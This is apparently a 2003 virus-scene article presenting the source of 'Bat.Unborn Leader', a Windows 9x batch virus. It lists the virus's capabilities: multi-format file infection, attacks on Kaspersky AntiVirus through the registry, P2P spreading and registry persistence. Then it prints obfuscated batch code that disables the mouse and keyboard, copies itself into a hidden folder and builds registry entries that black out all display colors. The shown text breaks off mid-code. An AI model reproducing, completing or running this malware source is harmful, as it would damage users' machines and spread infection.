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Strange Article - Bat.Unborn Leader by DvL
finished on: 22.09.2003, 15:15 size: 10.927 bytes runs on: win9x ** Capabilities ** * multi-infector, infects .bat, .reg, .theme, autorun.inf, .com, .inf * in autorun.inf infection the virus will run every time the user enters in "my computer" * in .com infection, some .com files will be overwritten with a small .com file that only displays a silly message (payload), it can not spread itself * .inf infection was designed to affect the desktop.inf file used by atari to display the desktop of the current machine running, but it will also overwrite all .inf files from "inf" folder or any other it found * attacks Kaspersky AntiVirus via registry * spreads via p2p * it will copy itself on every disk (except b:\) * it will set my webpage as the default internet startup page * it will run every time the computer is restarted via registry =====[begin code]=============================================================== cLS cTtY NuL EChO OFf bReAK oFF rUNdLl32.ExE MoUSe,DiSAblE RuNDlL32.ExE kEYboARd,diSAblE Md c:\§°¸¨¹ >nul CoPy %0 c:\§°¸¨¹\joke.bat >nul echo.[CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\DefaultIcon]>_ echo.DefaultValue=c:\windows\Explorer.exe,0>>_ echo.>>_ echo.[CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\DefaultIcon]>>_ echo.DefaultValue=c:\windows\System\shell32.dll,0>>_ echo.>>_ echo.[CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\DefaultIcon]>>_ echo.empty=c:\windows\System\shell32.dll,0>>_ echo.full=c:\windows\System\shell32.dll,0>>_ echo.>>_ echo.>>_ echo.[Control Panel\Colors]>>_ echo.ActiveTitle=0 0 0>>_ echo.Background=0 0 0>>_ echo.Hilight=0 0 0>>_ echo.HilightText=0 0 0>>_ echo.TitleText=0 0 0>>_ echo.Window=0 0 0>>_ echo.WindowText=0 0 0>>_ echo.Scrollbar=0 0 0>>_ echo.InactiveTitle=0 0 0>>_ echo.Menu=0 0 0>>_ echo.WindowFrame=0 0 0>>_ echo.MenuText=0 0 0>>_ echo.ActiveBorder=0 0 0>>_ echo.InactiveBorder=0 0 0>>_ echo.AppWorkspace=0 0 0>>_ echo.ButtonFace=0 0 0>>_ echo.ButtonShadow=0 0 0>>_ echo.GrayText=0 0 0>>_ echo.ButtonText=0 0 0>>_ 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